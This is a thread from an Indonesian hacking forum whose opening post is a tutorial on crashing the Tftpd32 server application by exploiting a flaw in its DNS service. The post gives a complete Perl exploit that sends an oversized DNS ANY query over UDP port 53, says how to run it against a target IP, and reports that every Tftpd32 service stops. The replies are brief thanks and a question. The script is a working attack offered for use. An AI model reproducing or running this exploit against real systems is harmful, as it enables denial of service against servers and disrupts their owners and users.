|
| Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server | |
| | Pengirim | Message |
---|
K-008 Pro Nubie
Jumlah posting : 59 Points : 119 Reputation : 10 Join date : 23.04.12
| Subyek: Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server Wed Jun 06, 2012 6:01 pm | |
| disini penulis akan memberikan tutorial dengan cara melakukan DoS pada suatu aplikasi yang menyediakan berbagai service server yaitu Tftpd32. Tftpd32 menyediakan berbagai service server seperti DHCP, TFTPD, DNS, SNTP dan sebagainya. Situs resmi program Tftpd32 ada di http://tftpd32.jounin.net.Celah keamanan DoS terdapat pada DNS Server yang dapat membuat program Tftpd tidak aktif lagi di server. Untuk mengetahui lebih jauh tentang bug pada aplikasi server ini anda dapat masuk ke http://www.exploit-db.com/exploits/18946.Untuk melakukan exploitasi sebagai berikut, pertama-tama pastikan ActivePerl sudah ada di komputer anda, lalu jalankan exploit yang yang dibuat oleh demonalex berikut : - Code:
-
#!/usr/bin/perluse IO::Socket; use Socket; use Math::BigInt; $|=1; $host=shift; $port=shift || ’53′; die “usage: $0 \$host [\$port]\n” if(!defined($host)); $target_ip = inet_aton($host); $target = sockaddr_in($port, $target_ip); $crash=’A'x128; $transaction_id_count=1; sub dns_struct_pack($){ $domain=shift; #domain $type=”\x00\xff”; #dns_type = ANY $transaction_id_count=1 if($transaction_id_count > 255); $x=Math::BigInt->new($transaction_id_count); $x=~s/0x//; $transaction_id=sprintf(“\x00″.chr($x)); $flag=”\x01\x00″; $question=”\x00\x01″; $answer_rrs=”\x00\x00″; $authority_rrs=”\x00\x00″; $additional_rrs=”\x00\x00″; if($domain ne ’0′){ undef($domain_length); $domain_length=length($domain); $y=Math::BigInt->new($domain_length); $y=~s/0x//; $domain_length=chr($y); } $class=”\x00\x01″; #IN $transaction_id_count++; if($domain eq ’0′){ $packet_struct=”$transaction_id”.”$flag”.”$question”.”$answer_rrs”.”$authority_rrs”.”$additional_rrs”.”\x00″.”$type”.”$class”; }else{ $packet_struct=”$transaction_id”.”$flag”.”$question”.”$answer_rrs”.”$authority_rrs”.”$additional_rrs”.”$domain_length”.”$domain”. “\x00″.”$type”.”$class”; } return $packet_struct; } print “Launch attack … “; socket(SOCK1, AF_INET, SOCK_DGRAM, 17); send(SOCK1, &dns_struct_pack($crash), 0, $target); close(SOCK1); print “Finish!\n”;exit(0); Exploit tersebut kita simpan dalam ekstensi .pl, misalnya dosdns.pl, setelah itu tinggal kita panggil exploit tersebut dengan ActivePerl. Cara penggunaannya adalah seperti diatas. Jika disini misal targetnya adalah 192.168.1.79 maka sebagai berikut Langsung otomatis program Tftpd32 keluar, semua service dari Tftpd32 baik DHCP, TFTP, DNS, SNTP, semua langsung mati alias tidak berfungsi, sampai si admin menjalankan kembali program Tftpd. Oleh Kurniawan | |
| | | CyberWild Moderator
Jumlah posting : 1665 Points : 2310 Reputation : 104 Join date : 11.06.11 Age : 43 Lokasi : internet cloud
| Subyek: Re: Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server Wed Jun 06, 2012 6:28 pm | |
| | |
| | | exploi Newbie - Hack
Jumlah posting : 408 Points : 464 Reputation : 13 Join date : 02.11.11 Lokasi : exploit
| Subyek: Re: Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server Thu Jun 07, 2012 11:29 am | |
| ajip dah | |
| | | irianto Private
Jumlah posting : 144 Points : 165 Reputation : 5 Join date : 21.09.11
| Subyek: Re: Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server Thu Jun 07, 2012 2:52 pm | |
| Ijin Seditot Gan........................ + Blajar kasian
SALAM C | |
| | | astroboy Top Nubie
Jumlah posting : 26 Points : 32 Reputation : 2 Join date : 31.10.11 Age : 38 Lokasi : Lampung
| Subyek: Re: Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server Mon Jul 16, 2012 3:51 pm | |
| Klo pake Mikrotik apa masih bisa tembus ya Gan..? | |
| | | Sponsored content
| Subyek: Re: Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server | |
| |
| | | | Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|